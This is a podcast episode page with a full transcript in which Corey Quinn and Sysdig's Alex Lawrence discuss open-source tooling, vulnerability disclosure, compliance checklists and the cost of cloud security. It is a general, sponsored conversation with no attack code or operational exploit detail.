An Open-Source Mindset in Cloud Security with Alex Lawrence

Episode Summary

Alex Lawrence, Field CISO at Sysdig, joins Corey on Screaming in the Cloud to discuss how he went from studying bioluminescence and mycology to working in tech, and his stance on why open source is the future of cloud security. Alex draws an interesting parallel between the creative culture at companies like Pixar and the iterative and collaborative culture of open-source software development, and explains why iteration speed is crucial in cloud security. Corey and Alex also discuss the pros and cons of having so many specialized tools that tackle specific functions in cloud security, and the different postures companies take towards their cloud security practices. 

Episode Show Notes & Transcript

About Alex

Alex Lawrence is a Field CISO at Sysdig. Alex has an extensive history working in the datacenter as well as with the world of DevOps. Prior to moving into a solutions role, Alex spent a majority of his time working in the world of OSS on identity, authentication, user management and security. Alex's educational background has nothing to do with his day-to-day career; however, if you'd like to have a spirited conversation on bioluminescence or fungus, he'd be happy to oblige.

Links Referenced:




Transcript

Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by our friends over at Sysdig, and they have brought to me Alexander Lawrence, who’s a principal security architect over at Sysdig. Alexander, thank you for joining me.

Alex: Hey, thanks for having me, Corey.

Corey: So, we all have fascinating origin stories. Invariably you talk to someone, no one in tech emerged fully-formed from the forehead of some God. Most of us wound up starting off doing this as a hobby, late at night, sitting in the dark, rarely emerging. You, on the other hand, studied mycology, so watching the rest of us sit in the dark and growing mushrooms was basically how you started, is my understanding of your origin story. Accurate, not accurate at all, or something in between?

Alex: Yeah, decently accurate. So, I was in school during the wonderful tech bubble burst, right, high school era, and I always told everybody, there’s no way I’m going to go into technology. There’s tons of people out there looking for a job. Why would I do that? And let’s face it, everybody expected me to, so being an angsty teenager, I couldn’t have that. So, I went into college looking into whatever I thought was interesting, and it turned out I had a predilection to go towards fungus and plants.

Corey: Then you realized some of them glow and that wound up being too bright for you, so all right, we’re done with this; time to move into tech?

Alex: [laugh]. Strangely enough, my thesis, my capstone, was on the coevolution of bioluminescence across aquatic and terrestrial organisms. And so, did a lot of focused work on specifically bioluminescent fungus and bioluminescing fish, like Photoblepharon palpebratus and things like that.

Corey: When I talk to people who are trying to figure out, okay, I don’t like what’s going on in my career, I want to do something different, and their assumption is, oh, I have to start over at square one. It’s no, find the job that’s halfway between what you’re doing now and what you want to be doing, and make lateral moves rather than starting over five years in or whatnot. But I have to wonder, how on earth did you go from A to B in this context?

Alex: Yeah, so I had always done tech. My first job really was in tech at the school districts that I went to in high school. And so, I went into college doing tech. I volunteered at the ELCA and other organizations doing tech, and so it basically funded my college career. And by the time I finished up through grad school, I realized my life was going to be writing papers so that other people could do the research that I was coming up with, and I thought that sounded like a pretty miserable life.

And so, it became a hobby, and the thing I had done throughout my entire college career was technology, and so that became my new career and vocation. So, I was kind of doing both, and then ended up landing in tech for the job market.

Corey: And you’ve effectively moved through the industry to the point where you’re now in security architecture over at Sysdig, which, when I first saw Sysdig launch many years ago, it was, this is an interesting tool. I can see observability stories, I can see understanding what’s going on at a deep level. I liked it as a learning tool, frankly. And it makes sense, with the benefit of hindsight, that oh, yeah, I suppose it does make some sense that there are security implications thereof. But one of the things that you’ve said that I really want to dig into that I’m honestly in full support of because it’ll irritate just the absolute worst kinds of people is—one of the core beliefs that you espouse is that security when it comes to cloud is inherently open-source-based or at least derived. I don’t want to misstate your position on this. How do you view it?

Alex: Yeah. Yeah, so basically, the stance I have here is that the future of security in cloud is open-source. And the reason I say that is that it’s a bunch of open standards that have basically produced a lot of the technologies that we’re using in that stack, right, your web servers, your automation tooling, all of your different components are built on open stacks, and people are looking to other open tools to augment those things. And the reality is, is that the security environment that we’re in is changing drastically in the cloud as opposed to what it was like in the on-premises world. On-prem was great—it still is great; a lot of folks still use it and thrive on it—but as we look at the way software is built and the way we interface with infrastructure, the cloud has changed that dramatically.

Basically, things are a lot faster than they used to be. The model we have to use in order to make sure our security is good has dramatically changed, right, and all that comes down to speed and how quickly things evolve. I tend to take a position that one single brain—one entity, so to speak—can’t keep up with that rapid evolution of things. Like, a good example is Log4j, right? When Log4j hit this last year, that was a pretty broad attack that affected a lot of people. You saw open tooling out there, like Falco and others, they had a policy to detect and help triage that within a couple of hours of it hitting the internet. Other proprietary tooling, it took much longer than two hours.

Corey: Part of me wonders what the root cause behind that delay is because it’s not that the engineers working at these companies are somehow worse than folks in the open communities. In some cases, they’re the same people. It feels like it’s almost corporate process ossification of, “Okay, we built a thing. Now, we need to make sure it goes through branding and legal and marketing and we need to bring in 16 other teams to make this work.” Whereas in the open-source world, it feels like there’s much more of a, “I push the deploy button and it’s up. The end.” There is no step two.

Alex: [laugh]. Yeah, so there is certainly a certain element of that. And I think it’s just the way different paradigms work. There’s a fantastic book out there called Creativity, Inc., and it’s basically a book about how Pixar manages itself, right? How do they deal with creating movies? How do they deal with doing what they do, well?

And really, what it comes down to is fostering a culture of creativity. And that typically revolves around being able to fail fast, take risks, see if it sticks, see if it works. And it’s not that corporate entities don’t do that. They certainly do, but again, if you think about the way the open-source world works, people are submitting, you know, PRs, pull requests, they’re putting out different solutions, different fixes to problems, and the ones that end up solving it the best are often the ones that end up coming to the top, right? And so, it’s just—the way you iterate is much more akin to that kind of creativity-based mindset that I think you get out of traditional organizations and corporations.

Corey: There’s also, I think—I don’t know if this is necessarily the exact point, but it feels like it’s at least aligned with it—where there was for a long time—by which I mean, pretty much 40 years at this point—a debate between open disclosure and telling people of things that you have found in vendors products versus closed disclosure; you only wind—or whatever the term is where you tell the vendor, give them time to fix it, and it gets out the door. But we’ve seen again and again and again, where researchers find something, report it, and then it sits there, in some cases for years, but then when it goes public and the company looks bad as a result, they scramble to fix it. I wish it were not this way, but it seems that in some cases, public shaming is the only thing that works to get companies to secure their stuff.

Alex: Yeah, and I don’t know if it’s public shaming, per se, that does it, or it’s just priorities, or it’s just, you know, however it might go, there’s always been this notion of, “Okay, we found a breach. Let’s disclose appropriately, you know, between two entities, give time to remediate.” Because there is a potential risk that if you disclose publicly that it can be abused and used in very malicious ways—and we certainly don’t want that—but there also is a certain level of onus once the disclosure happens privately that we got to go and take care of those things. And so, it’s a balancing act.

I don’t know what the right solution is. I mean, if I did, I think everybody would benefit from things like that, but we just don’t know the proper answer. The workflow is complex, it is difficult, and I think doing our due diligence to make sure that we disclose appropriately is the right path to go down. When we get those disclosures we need to take them seriously is when it comes down to.

Corey: What I find interesting is your premise that the future of cloud security is open-source. Like, I could make a strong argument that today, we definitely have an open-source culture around cloud security and need to, but you’re talking about that shifting along the fourth dimension. What’s the change? What do you see evolving?

Alex: Yeah, I think for me, it’s about the collaboration. I think there are segments of industries that communicate with each other very, very well, and I think there’s others who do a decent job, you know, behind closed doors, and I think there’s others, again, that don’t communicate at all. So, all of my background predominantly has been in higher-ed, K-12, academia, and I find that a lot of those organizations do an extremely good job of partnering together, working together to move towards, kind of, a greater good, a greater goal. An example of that would be a group out in the Pacific Northwest called NWACC—the NorthWest Academic Computing Consortium. And so, it’s every university in the Northwest all come together to have CIO Summits, to have Security Summits, to trade knowledge, to work together, basically, to have a better overall security posture.

And they do it pretty much out in the open and collaborating with each other, even though they are also direct competitors, right? They all want the same students. It’s a little bit of a different way of thinking, and they’ve been doing it for years. And I’m finding that to be a trend that’s happening more and more outside of just academia. And so, when I say the future is open, if you think about the tooling academia typically uses, it is very open-source-oriented, it is very collaborative.

There’s no specifications on things like eduPerson to be able to go and define what a user looks like. There’s things like, you know, CAS and Shibboleth to do account authorization and things like that. They all collaborate on tooling in that regard. We’re seeing more of that in the commercial space as well. And so, when I say the future of security in cloud is open-source, it’s models like this that I think are becoming more and more effective, right?

It’s not just the larger entities talking to each other. It’s everybody talking with each other, everybody collaborating with each other, and having an overall better security posture. The reality is, is that the folks we’re defending ourselves against, they already are communicating, they already are using that model to work together to take down who they view as their targets: us, right? We need to do the same to be able to keep up. We need to be able to have those conversations openly, work together openly, and be able to set that security posture across that kind of overall space.

Corey: There’s definitely a concern that if okay, you have all these companies and community collaborating around security aspects in public, that well won’t the bad actors be able to see what they’re looking at and how they’re approaching it and, in some cases, move faster than they can or, in other cases, effectively wind up polluting the conversation by claiming to be good actors when they’re not. And there’s so many different ways that this can manifest. It feels like fear is always the thing that stops people from going down this path, but there is some instance of validity to that I would imagine.

Alex: Yeah, no. And I think that certainly is true, right? People are afraid to let go of, quote-unquote, “The keys to their kingdom,” their security posture, their things like that. And it makes sense, right? There’s certain things that you would want to not necessarily talk about openly, like, specifically, you know, what Diffie–Hellman key exchange you’re using or something like that, but there are ways to have these conversations about risks and posture and tooling and, you know, ways you approach it that help everybody else out, right?

If someone finds a particularly novel way to do a detection with some sort of piece of tooling, they probably should be sharing that, right? Let’s not keep it to ourselves. Traditionally, just because you know the tool doesn’t necessarily mean that you’re going to have a way in. Certainly, you know, it can give you a path or a vector to go after, but if we can at least have open standards about how we implement and how we can go about some of these different concepts, we can all gain from that, so to speak.

Corey: Part of me wonders if the existing things that the large companies are collaborating on lead to a culture that specifically pushes back against this. A classic example from my misspent youth is that an awful lot of the anti-abuse departments at these large companies are in constant communication. Because if you work at Microsoft, or Google or Amazon, your adversary, as you see it, in the Trust and Safety Group is not those other companies. It’s bad actors attempting to commit fraud. So, when you start seeing particular bad actors emerging from certain parts of the network, sharing that makes everything better because there’s an understanding there that it’s not, “Oh, Microsoft has bad security this week,” or, “Google will wind up approving fraudulent accounts that start spamming everyone.”

Because the takeaway by theby the customers is not that this one company is bad; it’s oh, the cloud isn’t safe. We shouldn’t use cloud. And that leads to worse outcomes for basically everyone. But they’re als—one of the most carefully guarded secrets at all these companies is how they do fraud prevention and spam detection because if adversaries find that out, working around them becomes a heck of a lot easier. I don’t know, for example, how AWS determines whether a massive account overage in a free-tier account is considered to be a bad actor or someone who made a legitimate mistake. I can guess, but the actual signal that they use is something that they would never in a million years tell me. They probably won’t even tell each other specifics of that.

Alex: Certainly, and I’m not advocating that they let all of the details out, per se, but I think it would be good to be able to have more of an open posture in terms of, like, you know what tooling do they use? How do they accomplish that feat? Like, are they looking at a particular metric? How do they basically handle that posture going forward? Like, what can I do to replicate a similar concept?

I don’t need to know all the details, but would be nice if they embrace, you know, open tooling, like say a Trivy or a Falco or whatever the thing is, right, they’re using to do this process and then contribute back to that project to make it better for everybody. When you kind of keep that stuff closed-source, that’s when you start running into that issue where, you know, they have that, quote-unquote, “Advantage,” that other folks aren’t getting. Maybe there’s something we can do better in the community, and if we can all be better, it’s better for everybody.

Corey: There’s a constant customer pain in the fact that every cloud provider, for example, has its own security perspective—the way that identity is managed, the way that security boundaries exist, the way that telemetry from these things winds up getting represented—where a number of companies that are looking at doing things that have to work across cloud for a variety of reasons—some good, some not so good—have decided that, okay, we’re just going to basically treat all these providers as, more or less, dumb pipes and dumb infrastructure. Great, we’re just going to run Kubernetes on all these things, and then once it’s inside of our cluster, then we’ll build our own security overlay around all of these things. They shouldn’t have to do that. There should be a unified set of approaches to these things. At least, I wish there were.

Alex: Yeah, and I think that’s where you see a lot of the open standards evolving. A lot of the different CNCF projects out there are basically built on that concept. Like, okay, we’ve got Kubernetes. We’ve got a particular pipeline, we’ve got a particular type of implementation of a security measure or whatever it might be. And so, there’s a lot of projects built around how do we standardize those things and make them work cross-functionally, regardless of where they’re running.

It’s actually one of the things I quite like about Kubernetes: it makes it be a little more abstract for the developers or the infrastructure folks. At one point in time, you had your on-premises stuff and you built your stuff towards how your on-prem looked. Then you went to the cloud and started building yourself to look like what that cloud look like. And then another cloud showed up and you had to go use that one. Got to go refactor your application to now work in that cloud.

Kubernetes has basically become, like, this gigantic API ball to interface with the clouds, and you don’t have to build an application four different ways anymore. You can build it one way and it can work on-prem, it can work in Google, Azure, IBM, Oracle, you know, whoever, Amazon, whatever it needs to be. And then that also enables us to have a standard set of tools. So, we can use things like, you know, Rego or we can use things like Falco or we can use things that allow us to build tooling to secure those things the same way everywhere we go. And the benefit of most of those tools is that they’re also configured, you know, via some level of codification, and so we can have a repository that contains our posture: apply that posture to that cluster, apply it to the other cluster in the other environment. It allows us to automate these things, go quicker, build the posture at the very beginning, along with that application.

Corey: One of the problems I feel as a customer is that so many of these companies have a model for interacting with security issues that’s frankly obnoxious. I am exhausted by the amount of chest-thumping, you’ll see on keynote stages, all of the theme, “We’re the best at security.” And whenever a vulnerability researcher reports something of a wide variety of different levels of severity, it always feels like the first concern from the company is not fix the issue, but rather, control the messaging around it.

Whenever there’s an issue, it’s very clear that they will lean on people to rephrase things, not use certain words. It’s, I don’t know if the words used to describe this cross-tenant vulnerability are the biggest problem you should be focusing on right now. Yes, I understand that you can walk and chew gum at the same time as a big company, but it almost feels like the researchers are first screaming into a void, and then they’re finally getting attention, but from all the people they don’t want to get the attention from. It feels like this is not a welcoming environment for folks to report these things in good faith.

Alex: [sigh]. Yeah, it’s not. And I don’t know what the solution is to that particular problem. I have opinions about why that exists. I won’t go into those here, but it’s cumbersome. It’s difficult. I don’t envy a lot of those research organizations.

They’re fantastic people coming up with great findings, they find really interesting stuff that comes out, but when you have to report and do that due diligence, that portion is not that fun. And then doing, you know, the fallout component, right: okay, now we have this thing we have to report, we have to go do something to fix it, you’re right. I mean, people do often get really spun up on the verbiage or the implications and not just go fix the problem. And so again, if you have ways to mitigate that are more standards-based, that aren’t specific to a particular cloud, like, you can use an open-source tool to mitigate, that can be quite the advantage.

Corey: One of the challenges that I see across a wide swath of tooling and approaches to it have been that when I was trying to get some stuff to analyze CloudTrail logs in my own environment, I was really facing a bimodal distribution of options. On one end of the spectrum, it’s a bunch of crappy stuff—or good stuff; hard to say—but it’s all coming off of GitHub, open-source, build it yourself, et cetera. Good luck. And that’s okay, awesome, but there’s business value here and I’m thrilled to pay experts to make this problem go away.

The other end of the spectrum is commercial security tooling, and it is almost impossible in my experience to find anything that costs less than $1,000 a month to start providing insight from a security perspective. Now, I understand the market forces that drive this. Truly I do, and I’m sympathetic to them. It is just as easy to sell $50,000 worth of software as it is five to an awful lot of companies, so yeah, go where the money is. But it also means that the small end of the market as hobbyists, as startups are just getting started, there is a price barrier to engaging in the quote-unquote, “Proper way,” to do security.

So, the posture suffers. We’ll bolt security on later when it becomes important is the philosophy, and we’ve all seen how well that plays out in the fullness of time. How do you square that circle? I think the answer has to be open-source improving to the point where it’s not just random scripts, but renowned projects.

Alex: Correct, yeah, and I’d agree with that. And so, we’re kind of in this interesting phase. So, if you think about, like, raw Linux applications, right, Linux, always is the tenant that you build an application to do one thing, does that one thing really, really, really well. And then you ended up with this thing called, like, you know, the Cacti monitoring stack. And so, you ended up having, like, 600 tools you strung together to get this one monitoring function done.

We’re kind of in a similar spot in a lot of ways right now, in the open-source security world where, like, if you want to do scanning, you can do, like, Clair or you can do Trivy or you have a couple different choices, right? If you want to do posture, you’ve got things like Qbench that are out there. If you want to go do runtime security stuff, you’ve got something like Falco. So, you’ve got all these tools to string together, right, to give you all of these different components. And if you want, you can build it yourself, and you can run it yourself and it can be very fun and effective.

But at some point in your life, you probably don’t want to be care-and-feeding your child that you built, right? It’s 18 years later now, and you want to go back to having your life, and so you end up buying a tool, right? That’s why Gartner made this whole CNAP category, right? It’s this humongous category of products that are putting all of these different components together into one gigantic package. And the whole goal there is just to make lives a little bit easier because running all the tools yourself, it’s fun, I love it, I did it myself for a long time, but eventually, you know, you want to try to work on some other stuff, too.

Corey: At one point, I wound up running the numbers of all of the first-party security offerings that AWS offered, and for most use cases of significant scale, the cost for those security services was more than the cost of the theoretical breach that they’d be guarding against. And I think that there’s a very dangerous incentive that arises when you start turning security observability into your own platform as a profit center. Because it’s, well, we could make a lot of money if we don’t actually fix the root issue and just sell tools to address and mitigate some of it—not that I think that’s the intentional direction that these companies are taking these things and I don’t want to ascribe malice to them, but you can feel that start to be the trend that some decisions get pushed in.

Alex: Yeah, I mean, everything comes down to data, right? It has to be stored somewhere, processed somewhere, analyzed somewhere. That always has a cost with it. And so, that’s always this notion of the shared security model, right? We have to have someone have ownership over that data, and most of the time, that’s the end-user, right? It’s their data, it’s their responsibility.

And so, these offerings become things that they have that you can tie into to work within the ecosystem, work within their infrastructure to get that value out of your data, right? You know, where is the security model going? Where do I have issues? Where do I have misconfigurations? But again, someone has to pay for that processing time. And so, that ends up having a pretty extreme cost to it.

And so, it ends up being a hard problem to solve. And it gets even harder if you’re multi-cloud, right? You can’t necessarily use the tooling of AWS inside of Azure or inside of Google. And other products are trying to do that, right? They’re trying to be able to let you integrate their security center with other clouds as well.

And it’s kind of created this really interesting dichotomy where you almost have frenemies, right, where you’ve got, you know, a big Azure customer who’s also a big AWS customer. Well, they want to go use Defender on all of their infrastructure, and Microsoft is trying to do their best to allow you to do that. Conversely, not all clouds operate in that same capacity. And you’re correct, they all come at extremely different costs, they have different price models, they have different ways of going about it. And it becomes really difficult to figure out what is the best path forward.

Generally, my stance is anything is better than nothing, right? So, if your only choice is using Defender to do all your stuff and it cost you an arm or leg, unfortunate, but great; at least you got something. If the path is, you know, go use this random open-source thing, great. Go do that. Early on, when I’d been at—was at Sysdig about five years ago, my big message was, you know, I don’t care what you do. At least scan your containers. If you’re doing nothing else in life, use Clair; scan the darn things. Don’t do nothing.

That’s not really a problem these days, thankfully, but now we’re more to a world where it’s like, well, okay, you’ve got your containers, you’ve got your applications running in production. You’ve scanned them, that’s great, but you’re doing nothing at runtime. You’re doing nothing in your posture world, right? Do something about it. So, maybe that is buy the enterprise tool from the cloud you’re working in, buy it from some other vendor, use the open-source tool, do something.

Thankfully, we live in a world where there are plenty of open tools out there we can adopt and leverage. You used the example of CloudTrail earlier. I don’t know if you saw it, but there was a really, really cool talk at SharkFest last year from Gerald Combs where they leveraged Wireshark to be able to read CloudTrail logs. Which I thought was awesome.

Corey: That feels more than a little bit ridiculous, just because it’s—I mean I guess you could extract the JSON object across the wire then reassemble it. But, yeah, I need to think on that one.

Alex: Yeah. So, it’s actually really cool. They took the plugins from Falco that exist and they rewired Wireshark to leverage those plugins to read the JSON data from the CloudTrail and then wired it into the Wireshark interface to be able to do a visual inspect of CloudTrail logs. So, just like you could do, like, a follow this IP with a PCAP, you could do the same concept inside of your cloud log. So, if you look up Logray, you’ll find it on the internet out there. You’ll see demos of Gerald showing it off. It was a pretty darn cool way to use a visualization, let’s be honest, most security professionals already know how to use in a more modern infrastructure.

Corey: One last topic that I want to go into with you before we call this an episode is something that’s been bugging me more and more over the years—and it annoyed me a lot when I had to deal with this stuff as a SOC 2 control owner and it’s gotten exponentially worse every time I’ve had to deal with it ever since—and that is the seeming view of compliance and security as being one and the same, to the point where in one of my accounts that I secured rather well, I thought, I installed security hub and finally jumped through all those hoops and paid the taxes and the rest and then waited 24 hours to gather some data, then 24 hours to gather more. Awesome. Applied the AWS-approved a foundational security benchmark to it and it started shrieking its bloody head off about all of the things that were insecure and not configured properly. One of them, okay, great, it complained that the ‘Block all S3 Public Access’ setting was not turned on for the account. So, I turned that on. Great.

Now, it’s still complaining that I have not gone through and also enabled the ‘Block Public Access Setting’ on each and every S3 bucket within it. That is not improving your security posture in any meaningful way. That is box-checking so that someone in a compliance role can check that off and move on to the next thing on the clipboard. Now, originally, they started off being good-intentioned, but the result is I’m besieged by these things that don’t actually matter and that means I’m not going to have time to focus on the things that actually do. Please tell me I’m wrong on some of this.

Alex: [laugh].

Corey: I really need to hear that.

Alex: I can’t. Unfortunately, I agree with you that a lot of that seems erroneous. But let’s be honest, auditors have a job for a reason.

Corey: Oh, I’m not besmirching the role of the auditor. Far from it. The problem I run into is that it’s the Human Nessus report that dumps out, “Here’s the 700 things to go fix in your environment,” as opposed to, “Here’s the five things you can do right now that will meaningfully improve your security posture.”

Alex: Yeah. And so, I think that’s a place we see a lot of vendors moving, and I think that is the right path forward. Because we are in a world where we generate reports that are miles and miles long, we throw them over a wall to somebody, and that person says, “Are you crazy?” Like, “You want me to go do what with my time?” Like, “No. I can’t. No. This is way too much.”

And so, if we can narrow these things down to what matters the most today, and then what can we get rid of tomorrow, that makes life better for everybody. There are certainly ways to accomplish that across a lot of different dimensions, be that vulnerability management, or configuration management stuff, runtime stuff, and that is certainly the way we should approach it. Unfortunately, not all frameworks allow us to look at it that way.

Corey: I mean, even AWS’s thing here is yelling at me for a number of services not having encryption-at-rest turned on, like CloudTrail logs, or SNS topics. It’s okay, let’s be very clear what that is defending against: someone stealing drives out of a data center and taking them off to view the data. Is that something that I need to worry about in a public cloud provider context? Not unless I’m the CIA or something pretty close to that. I mean, if you can get my data out of an AWS data center and survive, congratulations, I kind of feel like you’ve earned it at this point. But that obscures things I need to be doing that I’m not.

Alex: Back in the day, I had a customer who used to have—they had storage arrays and their storage arrays’ logins were the default login that they came with the array. They never changed it. You just logged in with admin and no password. And I was like, “You know, you should probably fix that.” And he sent a message back saying, “Yeah, you know, maybe I should, but my feeling is that if it got that far into my infrastructure where they can get to that interface, I’m already screwed, so it doesn’t really matter to me if I set that admin password or not.”

Corey: Yeah, there is a defense-in-depth argument to be made. I am not disputing that, but the Cisco world is melting down right now because of a bunch of very severe vulnerabilities that have been disclosed. But everything to exploit these things always requires, well you need access to the management interface. Back when I was a network administrator at Chapman University in 2006, even then, I knew, “Well, we certainly don’t want to put the management interfaces on the same VLAN that’s passing traffic.”

So, is it good that there’s an unpatched vulnerability there? No, but Shodan, the security vulnerability search engine shows over 80,000 instances that are affected on the public internet. It would never have occurred to me to put the management interface of important network gear on the public internet. That just is… I don’t understand that.

Alex: Yeah.

Corey: So, on some level, I think the lesson here is that there’s always someone who has something else to focus on at a given moment, and… where it’s a spectrum: no one is fully secure, but ideally, you don’t want to be the lowest of low-hanging fruit.

Alex: Right, right. I mean, if you were fully secure, you’d just turn it off, but unfortunately, we can’t do that. We have to have it be accessible because that’s our jobs. And so, if we’re having it be accessible, we got to do the best we can. And I think that is a good point, right? Not being the worst should be your goal, at the very, very least.

Doing bare minimums, looking at those checks, deciding if they’re relevant for you or not, just because it says the configuration is required, you know, is it required in your use case? Is it required for your requirements? Like, you know, are you a FedRAMP customer? Okay, yeah, it’s probably a requirement because, you know, it’s FedRAMP. They’re going to tell you got to do it. But is it your dev environment? Is it your demo stuff? You know, where does it exist, right? There’s certain areas where it makes sense to deal with it and certain areas where it makes sense to take care of it.

Corey: I really want to thank you for taking the time to talk me through your thoughts on all this. If people want to learn more, where’s the best place for them to find you?

Alex: Yeah, so they can either go to sysdig.com/opensource. A bunch of open-source resources there. They can go to falco.org, read about the stuff on that site, as well. Lots of different ways to kind of go and get yourself educated on stuff in this space.

Corey: And we will, of course, put links to that into the show notes. Thank you so much for being so generous with your time. I appreciate it.

Alex: Yeah, thanks for having me. I appreciate it.

Corey: Alexander Lawrence, principal security architect at Sysdig. I’m Cloud Economist Corey Quinn, and this episode has been brought to us by our friends, also at Sysdig. If you’ve enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you’ve hated this podcast, please leave a five-star review on your podcast platform of choice, along with an insulting comment that I will then read later when I pick it off the wire using Wireshark.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

Newsletter Footer

Get the Newsletter

Reach over 30,000 discerning engineers, managers, enthusiasts who actually care about the state of Amazon’s cloud ecosystems.

"*" indicates required fields

This field is for validation purposes and should be left unchanged.
Sponsor Icon Footer

Sponsor an Episode

Get your message in front of people who care enough to keep current about the cloud phenomenon and its business impacts.